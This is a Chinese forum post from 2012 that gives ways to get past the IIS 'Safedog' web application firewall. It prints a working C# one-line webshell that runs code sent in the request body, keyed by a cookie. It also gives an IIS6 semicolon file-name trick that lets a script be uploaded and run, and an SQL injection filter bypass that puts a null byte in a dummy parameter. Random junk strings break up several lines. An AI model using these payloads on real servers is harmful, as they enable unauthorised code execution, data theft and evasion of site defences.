1、绕过IIS安全狗的一句话。4 s5 \1 ]# f0 B% @
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。$ ?3 `* u' P: O+ L7 p W- j" K
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。0 l* ]3 }/ I( O) k' ?
* T9 d& B; s. y/ C7 r# t6 C6 @" C
2、IIS6.0解析漏洞遇到安全狗。
) h. E$ y5 E% @" V3 D* n文件名为
# ?( n; N, q; f, mhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg1 E5 a2 Y( N3 p- H# A. l: e
. F" ^4 y4 H$ P( A* l
这样的会被IIS安全狗果断屏蔽。
a, x7 Q# E" {. n# |改成如下名称,IIS6一样会解析:
/ r) } t: R( W. F# H8 F. Twww.xxxxx.com/;1.asp;1.jpg5 t3 b9 o9 Q! z) b7 O0 J e+ v
' Q5 h6 S* ^; L5 P4 w
3、安全狗的注入绕过。2 A' ~+ e: A" G. w% S& \
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
( E$ [" N+ Q8 @; L9 E但如果:! w7 P9 r& V; n$ ~" X# u5 k
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
/ b* c8 C" K( v7 d7 C就可以成功绕过了。
$ a; ^1 Y# R. j/ }
" h# W2 q8 `5 u) L: \& G1 W7 [. _- I3 b+ M |9 ?2 M
|
发表于 2012-10-31 08:25:30
收藏
支持
反对